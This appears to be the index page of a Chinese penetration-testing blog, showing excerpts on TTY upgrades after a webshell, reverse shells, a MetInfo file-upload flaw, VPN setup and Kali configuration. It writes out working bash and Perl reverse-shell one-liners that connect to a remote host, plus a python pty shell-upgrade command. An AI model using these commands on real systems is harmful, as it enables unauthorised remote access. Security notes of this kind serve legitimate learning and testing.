python模拟终端设备(tty)

Posted on 2018-05-21 | In shell

中国菜刀开启的shell有些功能是不可以执行的,需要转换为终端设备(tty)
一般Linux自带python环境，可以使用python模拟一个终端设备(tty)就可以执行了

1	python -c 'import pty;pty.spawn("/bin/sh")'

kali安装peda

Posted on 2018-05-16 | In linux

peda是gdb的一个插件，安装后gdb在分析逆向/溢出程序时能够提供更直观的显示。
安装peda:

1
2
3

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

注意:peda不支持python3版本的gdb

反弹shell

Posted on 2018-05-15 | In shell

0x01 Bash

这里shell由bash解析，有时候是由sh解析，/dev/[tcp|upd]/host/port是Linux设备里面比较特殊的文件，读取或写入相当于建立socket调用,命令执行后依然无法找到此目录和文件。

1	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

0x02 Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

MetInfo任意文件上传漏洞

Posted on 2018-05-13 | In Web安全

源码审计

MetInfo网站为V5.0.4 版本

MetInfo V.5.0.4存在变量覆盖导致任意文件上传漏洞，而且可以根据cms默认robots.txt文件查找到后台地址

Win10更换右键powershell为cmd

Posted on 2018-04-25 | In Windows

打开注册表

Win + R运行 regedit

使用ocserv搭建 VPN 畅游网络

Posted on 2018-03-24 | In linux

安装相关依赖及工具

1	# apt-get install build-essential pkg-config libgnutls28-dev libreadline-dev libseccomp-dev libwrap0-dev libnl-nf-3-dev liblz4-dev gnutls-bin

下载安装

1 2	# wget ftp://ftp.infradead.org/pub/ocserv/ocserv-0.10.8.tar.xz # tar xvf ocserv-0.10.8.tar.xz

CryptUnprotectData

Posted on 2018-01-31 | In Windows

CryptUnprotectData()

CryptUnprotectData function

1) 介绍

cryptUnprotectData函数对DATA_BLOB结构中的数据进行解密并进行完整性检查。唯一可以解密数据的用户是具有与加密数据的用户相同的登录凭据的用户。另外，加密和解密必须在同一台计算机上完成。

2) 用法

BOOL WINAPI CryptUnprotectData(
  _In_            DATA_BLOB                          *pDataIn,
  _Out_opt_     LPWSTR                *ppszDataDescr,
  _In_opt_     DATA_BLOB              *pOptionalEntropy,
  _Reserved_     PVOID                pvReserved,
  _In_opt_     CRYPTPROTECT_PROMPTSTRUCT           *pPromptStruct,
  _In_      DWORD                 dwFlags,
  _Out_      DATA_BLOB               *pDataOut
);

CentOS 7 使用 Cryptcat

Posted on 2017-12-27 | In linux

Cryptcat简介

由于Netcat本身建立的传输通道是不加密的，所以其采用两种加密方式进行扩展，Cryptcat就是其中一种加密方式。Cryptcat是一个简单的Unix实用工具，在使用Netcat建立的网络连接进行读取和写入数据时，使用TCP或UDP协议加密正在传输的数据。它是一款可靠的“后端”工具。

安装

1) 下载

1	# wget http://ftp.tu-chemnitz.de/pub/linux/dag/redhat/el7/en/x86_64/rpmforge/RPMS/cryptcat-1.2.1-1.el7.rf.x86_64.rpm

kali安装后必不可少的配置

Posted on 2017-12-23 | In linux

kali介绍

Kali Linux是基于Debian的Linux发行版，设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成，BackTrack是他们之前写的用于取证的Linux发行版。
Kali Linux预装了许多渗透测试软件，包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像，可用于树莓派和三星的ARM Chromebook

配置

1)创建用户

(1) 打开终端。输入下面这个命令，即可创建新用户。( test 换为想要创建的用户名)

1	# useradd -m test

手机设置VPN

Posted on 2017-12-20 | In Android